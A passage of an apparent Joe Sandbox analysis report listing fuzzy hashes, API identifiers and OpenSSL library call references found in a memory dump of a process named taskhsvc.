                                                            • Opcode Fuzzy Hash: 9c876ec898b1c19df56ffb42426a2dcf9b693b9d97ad5a057f76df31dd411723
                                                            • Instruction Fuzzy Hash: F0214F756093008FD710DF69C18065BBBF0FF99358F26892EE9A997710D330E8058B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Y_new
                                                            • String ID:
                                                            • API String ID: 4109228036-0
                                                            • Opcode ID: 64d6c8711e843052a98c81828f7d22e6310a6015c2014464ac3516631772be5f
                                                            • Instruction ID: f95ac71938631b80edb4a661d3204a9866bf94e40d801962cc6f7993c3fa4d2e
                                                            • Opcode Fuzzy Hash: 64d6c8711e843052a98c81828f7d22e6310a6015c2014464ac3516631772be5f
                                                            • Instruction Fuzzy Hash: B42117716097019FD700DF25D69061BBBF0BF84B58F128D2DE8A88BB00E375D4459F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_i2dN1_item_new__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1700296266-0
                                                            • Opcode ID: 5a000d9ff727250ddc937a8738f25f19d87fd6b766eaaed0418cd93362fc324e
                                                            • Instruction ID: 69e05d92a8e60971582225112bb16f4170ff725ccbcfde5785a599fc63950b73
                                                            • Opcode Fuzzy Hash: 5a000d9ff727250ddc937a8738f25f19d87fd6b766eaaed0418cd93362fc324e
                                                            • Instruction Fuzzy Hash: 2D211F75A186019FCB00EF39C68165BB7F1BB99308F469D1CE554CBB04E231AA158B86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_free__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 759496812-0
                                                            • Opcode ID: 50b749a4929c469e814d093ec7d7d94e7e8053d281d954bda02916c64aaf7eaf
                                                            • Instruction ID: e7894c278a480fa8f445c89d7cf8478e86f9a84334d32075b404cde295ebe661
                                                            • Opcode Fuzzy Hash: 50b749a4929c469e814d093ec7d7d94e7e8053d281d954bda02916c64aaf7eaf
                                                            • Instruction Fuzzy Hash: CF21E0716197409FCB50EF39C280A4FBBF0AB89318F46991CE5A4CB700D331E9098F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_free__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 759496812-0
                                                            • Opcode ID: ee7d581bb7fc78c1493c159187e9becec541eb6d741d739efa472004d6b2f9f0
                                                            • Instruction ID: 2f506a126e5771f862a9aaffa95825a45fe9a2f12540f478f5affb5b5e91e278
                                                            • Opcode Fuzzy Hash: ee7d581bb7fc78c1493c159187e9becec541eb6d741d739efa472004d6b2f9f0
                                                            • Instruction Fuzzy Hash: 2B217575A197419FCB50EF79C68164BBBF1AB89318F42991CE6A4CB704D330E9098F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2i__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 314559513-0
                                                            • Opcode ID: f8271e47ce0855b56c6d651d85c5384dd93e7ab52be13a619d2c86624660cd7c
                                                            • Instruction ID: cf1a4a07e8a6f7c3dc68bb1406cf4ce3203e451c0e76eb1fd5d8e5d2383be1ee
                                                            • Opcode Fuzzy Hash: f8271e47ce0855b56c6d651d85c5384dd93e7ab52be13a619d2c86624660cd7c
                                                            • Instruction Fuzzy Hash: 2721E3715096409FCB50EF39C28168FBBF1AB89318F56991CE6A4CBB04D331E9098F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: |$|
                                                            • API String ID: 1767461275-183604375
                                                            • Opcode ID: fed53c1b3ffbdb350bb7ba7ef29e6e7f5f205d400e50c356631216372efaba33
                                                            • Instruction ID: 3d700a7d70c53170774e7683b34867d47f70d5ce182092acc6533acd8160d7ed
                                                            • Opcode Fuzzy Hash: fed53c1b3ffbdb350bb7ba7ef29e6e7f5f205d400e50c356631216372efaba33
                                                            • Instruction Fuzzy Hash: C821C2B15193029FE700DF24C54960BBBF0AB99798F21C90DE5A88B790C779D545CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF6E70B
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6E787
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6E7B3
                                                              • Part of subcall function 6CF6E610: ASN1_INTEGER_get.LIBEAY32 ref: 6CF6E425
                                                              • Part of subcall function 6CF6E610: OBJ_obj2nid.LIBEAY32 ref: 6CF6E43A
                                                              • Part of subcall function 6CF6E610: OBJ_nid2sn.LIBEAY32 ref: 6CF6E442
                                                              • Part of subcall function 6CF6E610: EVP_get_digestbyname.LIBEAY32 ref: 6CF6E44A
                                                              • Part of subcall function 6CF6E610: EVP_MD_size.LIBEAY32 ref: 6CF6E45C
                                                              • Part of subcall function 6CF6E610: PKCS12_key_gen_asc.LIBEAY32 ref: 6CF6E4A9
                                                              • Part of subcall function 6CF6E610: HMAC_CTX_init.LIBEAY32 ref: 6CF6E4B9
                                                              • Part of subcall function 6CF6E610: HMAC_Init_ex.LIBEAY32 ref: 6CF6E4DC
                                                              • Part of subcall function 6CF6E610: HMAC_Update.LIBEAY32 ref: 6CF6E4FB
                                                              • Part of subcall function 6CF6E610: HMAC_CTX_cleanup.LIBEAY32 ref: 6CF6E50B
                                                            • CRYPTO_memcmp.LIBEAY32 ref: 6CF6E7CE
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6E817
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error$J_obj2nid$D_sizeInit_exJ_nid2snO_memcmpP_get_digestbynameR_getS12_key_gen_ascUpdateX_cleanupX_initlh_retrieve
                                                            • String ID: l$w$~
                                                            • API String ID: 2221244672-2723911280
                                                            • Opcode ID: 38a381d092a97d88574171c4dd05297cf1e3b7c7502d8e2c94147caa67f048a6
                                                            • Instruction ID: f4b0f6b33a0f55b1767afe25cbaa744ed710fa5bd8a3f0b0cd2efc56205f7d94
                                                            • Opcode Fuzzy Hash: 38a381d092a97d88574171c4dd05297cf1e3b7c7502d8e2c94147caa67f048a6
                                                            • Instruction Fuzzy Hash: F91137766083008FD710CF29CA80A4ABBF4AB89358F158D1DE9A88BB11D730E944CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,6CEBC31D), ref: 6CED653A
                                                            • ENGINE_get_default_RAND.LIBEAY32 ref: 6CED6570
                                                            • ENGINE_get_RAND.LIBEAY32 ref: 6CED657E
                                                            • ENGINE_finish.LIBEAY32(?,?,?,?,?,?,?,?,?,6CEBC31D), ref: 6CED650F
                                                              • Part of subcall function 6CEBD660: CRYPTO_lock.LIBEAY32(?,?,?,?,?,?,?,?,?,00000000,?,6CE9E7FF), ref: 6CEBD69B
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_finishE_get_E_get_default_O_lock__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 3080994723-0
                                                            • Opcode ID: 03a6a750de51ad848faea8dcb10480264385f734a7ca315a4d5a2905adf3a655
                                                            • Instruction ID: 4b064eef005fb6417f64223312a96743f9e24a9c149fef344128215d01f2abc1
                                                            • Opcode Fuzzy Hash: 03a6a750de51ad848faea8dcb10480264385f734a7ca315a4d5a2905adf3a655
                                                            • Instruction Fuzzy Hash: 47115BB0A252018BDF40DF36D58060A37F8EB4630CF621E2DD560CB748E731E4468B85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$q
                                                            • API String ID: 0-1492360937
                                                            • Opcode ID: b56636168c4143b9b90e8693448bc2cd2e123de76011ba9773e1053ca8a9d2b5
                                                            • Instruction ID: 9f0280c48aa737e31880ff615592316c53cc23ed90b067d4ecc401e5e1420bc9
                                                            • Opcode Fuzzy Hash: b56636168c4143b9b90e8693448bc2cd2e123de76011ba9773e1053ca8a9d2b5
                                                            • Instruction Fuzzy Hash: AA11F3B04197009FD7109F26C94874BBBF4AF85758F26881CE5945BB90D3B9E8488F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_init$X_copy__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2907314389-0
                                                            • Opcode ID: a5de1b056d73e8dcb3f238e6d8f56c338765edfa2c28898cd2fdd29681000c59
                                                            • Instruction ID: b70d3caea9f8ae4c2d4f491365f400b39f8077f2c692ca00a41a6e3781050178
                                                            • Opcode Fuzzy Hash: a5de1b056d73e8dcb3f238e6d8f56c338765edfa2c28898cd2fdd29681000c59
                                                            • Instruction Fuzzy Hash: F411B6745157048FCB00EF35C68498BBBF8AF49308F52596AEA94CB704E734E549CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: s
                                                            • API String ID: 0-453955339
                                                            • Opcode ID: c1e3404dd9a4195a2136637efd757ef29922319742a9c20a05cf894b61b97089
                                                            • Instruction ID: 25ba2031af8922fca86180ab0130a35c5bedea4fdcdc639c916a8953fa246a51
                                                            • Opcode Fuzzy Hash: c1e3404dd9a4195a2136637efd757ef29922319742a9c20a05cf894b61b97089
                                                            • Instruction Fuzzy Hash: EC115EB16087119FDB00DF29C64021BB7F1BB89358F129A2CE9A99B740C775E905CBD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$TRUE$f$i
                                                            • API String ID: 0-1108683577
                                                            • Opcode ID: 038218182e34adf1e7f06adcfd03a88722d08fedbdb90b65949b81df3816f7c0
                                                            • Instruction ID: 923f76785a0afa25cc50fc335c13df995c7a25ebcae2fde9bc84cd223e57394f
                                                            • Opcode Fuzzy Hash: 038218182e34adf1e7f06adcfd03a88722d08fedbdb90b65949b81df3816f7c0
                                                            • Instruction Fuzzy Hash: 8401A2B15087018BE700AF75C54465FBFF0AB80308F119C2CE9944B741D779C448CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF6AD49
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • PKCS12_SAFEBAGS_it.LIBEAY32 ref: 6CF6AD53
                                                            • ASN1_item_unpack.LIBEAY32 ref: 6CF6AD62
                                                              • Part of subcall function 6CF26C60: ASN1_item_d2i.LIBEAY32 ref: 6CF26C97
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6ADA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_obj2nidN1_item_d2iN1_item_unpackR_put_errorS12_S_itlh_retrieve
                                                            • String ID: y
                                                            • API String ID: 1570842488-4225443349
                                                            • Opcode ID: 394e48df7ea800dbdbc5739300cfc84de5c0ab95a6b4a8adda2b9a77550d6865
                                                            • Instruction ID: 18ec257549a7d66f0991e5cf616a24b7622374aebda43880af22b87eb5fb009a
                                                            • Opcode Fuzzy Hash: 394e48df7ea800dbdbc5739300cfc84de5c0ab95a6b4a8adda2b9a77550d6865
                                                            • Instruction Fuzzy Hash: CB01A4B19187019FDB00EF75D58464ABBF0BB85348F428D0CE9989BB00D775A54A8B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_new__stack_chk_fail
                                                            • String ID: :$r$s
                                                            • API String ID: 4283806828-1836192333
                                                            • Opcode ID: f9ddee6d3788e61ea8cb385e80fdf814cb333d024ce622f617c002d0f4b5b86d
                                                            • Instruction ID: 932f34c2bd339077839884b362693339b919ea4f8e8e13974dee22fc75f0d558
                                                            • Opcode Fuzzy Hash: f9ddee6d3788e61ea8cb385e80fdf814cb333d024ce622f617c002d0f4b5b86d
                                                            • Instruction Fuzzy Hash: 1CF01D316156009FDB20DF65CA4054BB7F1AB89318F56991DE6749B700D330F9058BD7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_set_wordisxdigit
                                                            • String ID:
                                                            • API String ID: 63692809-0
                                                            • Opcode ID: 039d135d2c010d95b13725498bb835a97839946427f8cee97c538d009d4866a4
                                                            • Instruction ID: a0c3f74f18ee966301af11196b885257e61f93c1a5561082259fe397229c2b53
                                                            • Opcode Fuzzy Hash: 039d135d2c010d95b13725498bb835a97839946427f8cee97c538d009d4866a4
                                                            • Instruction Fuzzy Hash: FDC1D4309187458BC768CE68C4A46AEB7F6FF9630CF71452CD45697E44E730E90ACBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_failsk_freesk_numsk_value
                                                            • String ID:
                                                            • API String ID: 2969170662-0
                                                            • Opcode ID: ae3c90f02bff33442363332227eb4ce7d283104805d722200c0f481f79c9ba60
                                                            • Instruction ID: 097df72206ba3598e4882e2cb63c2adb80988fb3702b025dc6f3ca9a40b430a0
                                                            • Opcode Fuzzy Hash: ae3c90f02bff33442363332227eb4ce7d283104805d722200c0f481f79c9ba60
                                                            • Instruction Fuzzy Hash: D941683520D2818FDB04CF25C18064BBBF1BF8A318F118A1CEAA48BB50C771E855CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_write$O_indentO_printfO_vprintf__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 3352650482-0
                                                            • Opcode ID: d025b2f9481e81ba02fc92c04db782b5c163387ffc0410106c7c0117aeba0ee1
                                                            • Instruction ID: 15e2cb72071f9c6bc61a9a6dae711f8e165690ca874c71176f2105f785bf7ea5
                                                            • Opcode Fuzzy Hash: d025b2f9481e81ba02fc92c04db782b5c163387ffc0410106c7c0117aeba0ee1
                                                            • Instruction Fuzzy Hash: A8313A763097028FC300EF29C95166BBBE0EB88748F11882DE999C7710D734E449DB93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_finishY_asn1_find
                                                            • String ID:
                                                            • API String ID: 1002133939-0
                                                            • Opcode ID: 06629244ea800f3151208663289101129701a5e519f76fed224e798e5818a260
                                                            • Instruction ID: 68cdfbd83944fd66a44bbf2f8f7e8e9de9ca091b3275774e2fcc40227fecd302
                                                            • Opcode Fuzzy Hash: 06629244ea800f3151208663289101129701a5e519f76fed224e798e5818a260
                                                            • Instruction Fuzzy Hash: 893134B06083008FEB00EF25C18075ABBF0BF48798F25992CD8A99B749E736D544CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • PEM_read_PrivateKey.LIBEAY32 ref: 6CF2C8D4
                                                              • Part of subcall function 6CF2F630: BIO_s_file.LIBEAY32 ref: 6CF2F656
                                                              • Part of subcall function 6CF2F630: BIO_new.LIBEAY32 ref: 6CF2F65E
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: M_read_O_newO_s_filePrivate
                                                            • String ID:
                                                            • API String ID: 2318807758-0
                                                            • Opcode ID: db4626ba12c560ecad52fba967b89a8b40b49cc3ed06d1fd23bc6910c7c51c9b
                                                            • Instruction ID: b7fbcd0fefd1877545a1b00ac714d56a04cb895dc7fd85b8d5145dc475178780
                                                            • Opcode Fuzzy Hash: db4626ba12c560ecad52fba967b89a8b40b49cc3ed06d1fd23bc6910c7c51c9b
                                                            • Instruction Fuzzy Hash: 0D31D5756097019FD780EFA9C58061BBBF0BB89354F51992DF9A8C7710E334E9488F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • X509_CRL_it.LIBEAY32 ref: 6CF426E8
                                                            • OCSP_REQ_CTX_nbio_d2i.LIBEAY32 ref: 6CF426F8
                                                              • Part of subcall function 6CF730F0: OCSP_REQ_CTX_nbio.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CF426FD), ref: 6CF73111
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: L_itX509_X_nbioX_nbio_d2i
                                                            • String ID:
                                                            • API String ID: 3159624755-0
                                                            • Opcode ID: 77d878f641aef85256cc1a1a99b6b48d7100ab04756ccfd28a1f93082654a8c1
                                                            • Instruction ID: 38d5302349252892dfce0e771be535e763efa8daca1c9de024cd7f21fb58ff70
                                                            • Opcode Fuzzy Hash: 77d878f641aef85256cc1a1a99b6b48d7100ab04756ccfd28a1f93082654a8c1
                                                            • Instruction Fuzzy Hash: 8D2136B59087019FCB00DF25D58494BBBF4FF89358F06892EE59897310D331A949CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: S7_it$E_read_O_new___stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 3000705294-0
                                                            • Opcode ID: 9ed410209fa8d76f592409d18052611f8fd58c1810b2675441e7431d8ee182b3
                                                            • Instruction ID: 282e81430957a155f3daf4a002780d56f59bbe512ab0ff318cc70d4de22d1cb7
                                                            • Opcode Fuzzy Hash: 9ed410209fa8d76f592409d18052611f8fd58c1810b2675441e7431d8ee182b3
                                                            • Instruction Fuzzy Hash: 6501E47051A750AFCB50EF36C68484FBBF4AF89208F12AD1DE69587B04D330E8498F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_free__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 759496812-0
                                                            • Opcode ID: 86fca0832cdfae91e92c0065fd8d3f8dd100637637e488e9c4ab126cb9b34e4a
                                                            • Instruction ID: a10d39ba69ed0418c4913e06aa957a7ad0759ea650b66f9d0ec807c219b2fe9a
                                                            • Opcode Fuzzy Hash: 86fca0832cdfae91e92c0065fd8d3f8dd100637637e488e9c4ab126cb9b34e4a
                                                            • Instruction Fuzzy Hash: F921C4719097409FCB50DF79D280A4FBBF1BB89314F46991CE5A8CB704D231E9098F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • X509_new.LIBEAY32 ref: 6CF348F2
                                                              • Part of subcall function 6CF08340: ASN1_item_new.LIBEAY32 ref: 6CF08355
                                                            • ERR_put_error.LIBEAY32 ref: 6CF34A57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_newR_put_errorX509_new
                                                            • String ID: A$M${
                                                            • API String ID: 877463836-3265063180
                                                            • Opcode ID: b1123be56daacaae072a79adbd6b1bf091dc31028b96f52456a4d90864d0f00b
                                                            • Instruction ID: 10707f2bb0743ec87090a7cb1d6e06394885e7507e273e4f5e44dccc68d10920
                                                            • Opcode Fuzzy Hash: b1123be56daacaae072a79adbd6b1bf091dc31028b96f52456a4d90864d0f00b
                                                            • Instruction Fuzzy Hash: 061112B46087109FDB04EF2AD98055ABBF4AF88358F12582DE999DB710E735E840CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_i2dN1_item_new__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1700296266-0
                                                            • Opcode ID: 55b68aa0ca8519d36a68b8f8b9939dc6e83eeaad524c9f8c5a2cfa925b8dc53b
                                                            • Instruction ID: 4c227ce86c5d9027cf1a266a2d8730070d650e22c4883fdf2489e40c0a0e490e
                                                            • Opcode Fuzzy Hash: 55b68aa0ca8519d36a68b8f8b9939dc6e83eeaad524c9f8c5a2cfa925b8dc53b
                                                            • Instruction Fuzzy Hash: BE112A759086019FCB10EF35C28161BB7F1BB8A308F469D1CE9948B704E331EA598B86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2iN1_item_i2d__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 3790965068-0
                                                            • Opcode ID: ca0383b3f338247b6ced0ccfde8a3c3a7c4a1a5e760433e6f0c6409224392328
                                                            • Instruction ID: e6fc23388d1ba82cec0b4c771d199e92f622cf8b2822eb65498acf98f621b91e
                                                            • Opcode Fuzzy Hash: ca0383b3f338247b6ced0ccfde8a3c3a7c4a1a5e760433e6f0c6409224392328
                                                            • Instruction Fuzzy Hash: 3311B0756096019FCB40EF79C28164BBBF1AB89208F42991CE5A4CB704E730A9098F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: F_parse_listsscanfstrchr
                                                            • String ID: :
                                                            • API String ID: 916882889-336475711
                                                            • Opcode ID: 434c26054a261cc8026e30d3bc1aca213ad4cc3dd730dc51535f12d71f1bd909
                                                            • Instruction ID: 29fab1ca65f315084c11dbbea9262ef5864171fabe09921425a9908a56d836f9
                                                            • Opcode Fuzzy Hash: 434c26054a261cc8026e30d3bc1aca213ad4cc3dd730dc51535f12d71f1bd909
                                                            • Instruction Fuzzy Hash: 73B17D352093458FEB21CF28C18135BFFE1BF85318F15CA6DE9968BA86D7319506CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • i2d_X509_NAME.LIBEAY32 ref: 6CF34F84
                                                              • Part of subcall function 6CF07E50: ASN1_item_i2d.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,6CF350B8), ref: 6CF07E75
                                                            • EVP_MD_CTX_init.LIBEAY32 ref: 6CF34F90
                                                            • EVP_MD_CTX_set_flags.LIBEAY32 ref: 6CF34FA0
                                                            • EVP_md5.LIBEAY32 ref: 6CF34FA5
                                                            • EVP_DigestInit_ex.LIBEAY32 ref: 6CF34FB9
                                                              • Part of subcall function 6CEDCFD0: EVP_MD_CTX_clear_flags.LIBEAY32 ref: 6CEDCFF8
                                                            • EVP_MD_CTX_cleanup.LIBEAY32 ref: 6CF34FC7
                                                            • EVP_DigestUpdate.LIBEAY32 ref: 6CF34FF3
                                                            • EVP_DigestFinal_ex.LIBEAY32 ref: 6CF3500F
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF3501E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF35057
